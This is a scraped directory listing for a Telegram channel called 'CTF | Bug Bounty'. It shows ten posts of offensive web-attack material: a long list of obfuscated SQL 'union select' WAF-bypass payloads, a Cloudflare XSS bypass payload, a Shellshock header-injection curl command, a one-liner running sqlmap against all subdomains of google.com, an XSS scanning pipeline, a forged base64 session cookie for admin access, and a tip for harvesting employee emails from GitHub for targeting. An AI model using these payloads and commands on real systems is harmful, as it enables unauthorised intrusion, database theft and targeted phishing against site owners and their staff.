CTF | Bug Bounty

Public

View Channel

Can't Join? @ctftm

8.2k Members

Updated: May 14, 2026 at 4:04 AM

CTF | Bug Bounty

🔐 Join Us for 🔐 🌐 CTF Resources 🌐 Bug Bounty Resources 🌐 CTF Challenges and More Join now: https://t.me/ctftm 👤 Owner: Team Matrix ᴅᴍᴄᴀ/ᴄᴏᴘʏʀɪɢʜᴛ ᴄʟᴀɪᴍ : @Dmcatm Admin Contact: @Teammatrixs_bot

@ctftm is a dedicated channel for more and owner with regular updates in Viral Videos

Ranking

Global Ranking

#456

Language Ranking

#45

Category Ranking

#23

-1

Participant Growth (Last 7 Days)

Total: 8.2K

24h growth: +0 0%

Latest Posts

CTF | Bug Bounty

May 25, 2026, 12:45 AM

📷 Photo

🔰 Collect emails, usernames from commit history of repos of an org from GitHub for more personalized targeting of employees.

GitHub: http://ghintel.secrets.ninja/

3,310

CTF | Bug Bounty

May 25, 2026, 12:45 AM

Akamai WAF bypass XSS

click and write here!

#WAF #Bypass

2,570

CTF | Bug Bounty

May 25, 2026, 12:45 AM

A simple hunt can flip the whole game!🌀
While testing a web app, I noticed this suspicious-looking session cookie:

Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==

I quickly ran it through Base64 decoding:

echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow 😳 — it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...

I modified the role from user to admin:

echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:

Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=

BOOM 💥 Instantly, we got admin access!🔥

#collected

3,060

CTF | Bug Bounty

May 25, 2026, 12:45 AM

📎 File

🔰Download all bug bounty programs domains in scope items!

Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!

👇🏼Step 1: Download the domains.txt file

📂step 2: Extract only main/root domains

cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains

📂Step 3: Extract all IP addresses:

grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt

Don't forget to give reactions❤️

3,250

CTF | Bug Bounty

May 25, 2026, 12:45 AM

A Method To Get Subdomains And Scan All By SQLmap And Save Vulns.

subfinder -d google.com -o subdomains.txt && sqlmap -m subdomains.txt --batch --random-agent --crawl=1 --dbs | tee sqlmap_output.txt | grep -E "available databases|[*]" > vulnerable.txt

2,770

CTF | Bug Bounty

May 25, 2026, 12:45 AM

Good XSS Hunting Method.

echo "http://example.com" | waybackurls | gf xss | xargs -I {} python3 XSStrike/xsstrike.py -u {}

2,920

CTF | Bug Bounty

May 25, 2026, 12:45 AM

Shellshock Exploit To Inject The Header By RCE.

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com

I used /bin/eject to avoid making any demonstrative effect. You can edit.

2,970

CTF | Bug Bounty

May 25, 2026, 12:45 AM

Bypass SQL union select

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*! SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*! UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*! UnIoN*/+/*! SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*! UnIoN*/SeLecT+

#Bypass #SQL

CTF | Bug Bounty

May 25, 2026, 12:45 AM

bypass XSS Cloudflare WAF

Encoded Payload:

"><track/onerror='confirm\%601\%60'>

Clean Payload:

">

HTML entity & URL encoding:

" --> "
> --> >
< --> <
' --> '
` --> \%60

#Bypass #XSS #WAF

2,860

CTF | Bug Bounty

May 25, 2026, 12:45 AM

Automating SSRF using Autorepeater

In the window of Auto-Repeater, we can specify some regex to find urls.

https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)

#SSRF
L

3,110

Showing 10 of 10 posts

No more posts

Loading posts...

Rating

User Reviews (0)

No reviews yet. Be the first to share your experience!

Loading reviews...

Related Telegram Channels

Loading recommended channels...

CTF | Bug Bounty

CTF | Bug Bounty

Ranking

Participant Growth (Last 7 Days)

Latest Posts

Rating

User Reviews (0)

Related Telegram Channels

Goat

BOOM CRASH PIPS

Alt Skull's Charnel House

RTV | Rasmiy

Editing Assets

Top Telegram Channels - Europe

BUGUN | RASMIY

GOATS Channel

Related Telegram Channels

Goat

BOOM CRASH PIPS

Alt Skull's Charnel House

RTV | Rasmiy

Editing Assets

Top Telegram Channels - Europe

BUGUN | RASMIY

GOATS Channel

User Reviews (0)

Latest Posts